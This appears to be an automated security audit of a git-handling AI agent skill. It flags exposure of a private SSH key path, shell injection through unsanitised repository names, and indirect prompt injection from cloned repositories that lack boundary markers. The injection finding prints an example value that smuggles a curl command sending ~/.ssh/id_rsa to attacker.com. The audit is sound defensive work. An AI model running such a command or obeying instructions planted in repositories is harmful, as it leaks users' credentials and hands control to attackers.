The Agent Skills Directory

[Data Exposure & Exfiltration] (HIGH): The skill explicitly references and utilizes a sensitive private SSH key located at ~/.ssh/github_ed25519. Accessing or exposing paths to private keys is a high-severity finding as it facilitates credential theft and unauthorized remote access.
[Unverifiable Dependencies & Remote Code Execution] (HIGH): The skill constructs shell commands (e.g., git clone, cd && git pull) by directly interpolating user-provided strings for repository names and owners. Without proper sanitization or use of safe APIs, an attacker could inject malicious shell commands using metacharacters like ;, &&, or | (e.g., reponame; curl http://attacker.com/leak?data=$(cat ~/.ssh/id_rsa)).
[Indirect Prompt Injection] (LOW):
Ingestion points: Untrusted data enters the environment through git clone and git pull from external sources (e.g., anthropics/claude-code).
Boundary markers: None. There are no instructions or delimiters to prevent the agent from following malicious instructions contained within the files of the cloned repositories.
Capability inventory: The skill possesses powerful capabilities including shell command execution (git, ssh, cd), filesystem writes, and network operations (git push, git pull).
Sanitization: None. The content of the repositories is not scanned or validated before being placed into the local workspace.

github